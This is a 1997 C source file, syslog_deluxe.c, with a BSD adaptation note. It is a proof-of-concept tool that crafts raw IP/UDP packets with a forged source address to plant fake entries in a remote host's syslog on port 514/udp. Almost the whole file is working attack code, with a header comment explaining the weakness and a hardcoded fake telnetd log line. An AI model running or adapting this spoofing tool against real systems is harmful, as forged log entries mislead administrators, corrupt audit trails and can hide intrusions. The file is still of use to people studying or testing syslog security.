/* syslog_deluxe.c This program sends a spoofed syslog message. Your have to be root to run it. Source and target IP addresses, message text, facility and priority are supplied by the user. It exploits the fact that many syslogd implementations listen to port 514/udp and accept whatever datagrams arrive, thus making it very easy to spoof syslog entries. Some versions of syslogd allow to turn off this feature, some don't. The code compiles and works under Linux. Any Unix that has SOCK_RAW/IPPROTO_RAW should be no problem (you may need to use BSD-style struct ip though). It may use few improvements, like checking for possible ICMP Port Unreachable errors in case the remote machine doesn't run syslogd with remote reception turned on. The idea behind this program is a proof of a concept, nothing more. It comes as is, no warranty. However, you're allowed to use it under one condition: you must use your brain simultaneously. If this condition is not met, you shall forget about this program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */ /* This is the *BSD adaptation...will it work? Rocco Lucia http://alice.iscanet.com/~rlucia/devel/patches/syslog_deluxe.diff */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IPVERSION 4 /* This is the stuff that actually gets sent. Feel free to change it */ #define MESSAGE_FAC LOG_DAEMON #define MESSAGE_PRI LOG_INFO char message[] = {"telnetd[4489]: connection from devil@hell.org.universe\n"}; struct raw_pkt_hdr { struct ip ip; /* ..and this is BSD way */ struct udphdr udp; }; struct raw_pkt_hdr* pkt; void die(char *); in_addr_t get_ip_addr(char*); unsigned short checksum(unsigned short*,char); int main(int argc,char** argv){ struct sockaddr_in sa; int sock,packet_len; char usage[] = {"\ syslog_deluxe, yuri volobuev'97\n\ make syslog look the way you want, here there and everywhere\n\ \t usage: syslog_deluxe src_hostname dst_hostname\n"}; char on = 1; if(argc != 3)die(usage); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){ perror("socket"); exit(1); } sa.sin_addr.s_addr = get_ip_addr(argv[2]); sa.sin_family = AF_INET; packet_len = sizeof(struct raw_pkt_hdr)+strlen(message)+4; pkt = calloc((size_t)1,(size_t)packet_len); pkt->ip.ip_v = IPVERSION; pkt->ip.ip_hl = sizeof(struct ip) >> 2; pkt->ip.ip_tos = 0; pkt->ip.ip_len = htons(packet_len); pkt->ip.ip_id = 0; pkt->ip.ip_off = 0; pkt->ip.ip_ttl = 0x40; pkt->ip.ip_p = IPPROTO_UDP; pkt->ip.ip_sum = 0; pkt->ip.ip_src.s_addr = get_ip_addr(argv[1]); pkt->ip.ip_dst.s_addr = sa.sin_addr.s_addr; pkt->ip.ip_sum = checksum((unsigned short*)pkt,sizeof(struct ip)); pkt->udp.uh_ulen = htons(packet_len - sizeof(struct ip)); pkt->udp.uh_sum = 0; /* If you feel like screwing around with pseudo-headers and stuff, you may of course calculate UDP checksum as well. I chose to leave it zero, it's usually OK */ sprintf((char*)pkt+sizeof(struct raw_pkt_hdr),"<%d>%s", (int)(MESSAGE_FAC | MESSAGE_PRI),message); if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){ perror("sendto"); exit(1); } exit(0); } void die(char* str){ fprintf(stderr,"%s\n",str); exit(1); } in_addr_t get_ip_addr(char* str){ struct hostent *hostp; struct in_addr addr; if( (addr.s_addr = inet_addr(str)) == -1){ if( (hostp = gethostbyname(str))) return *(unsigned long int*)(hostp->h_addr); else { fprintf(stderr,"unknown host %s\n",str); exit(1); } } return addr.s_addr; } unsigned short checksum(unsigned short* addr,char len){ /* This is a simplified version that expects even number of bytes */ register long sum = 0; while(len > 1){ sum += *addr++; len -= 2; } while (sum>>16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; }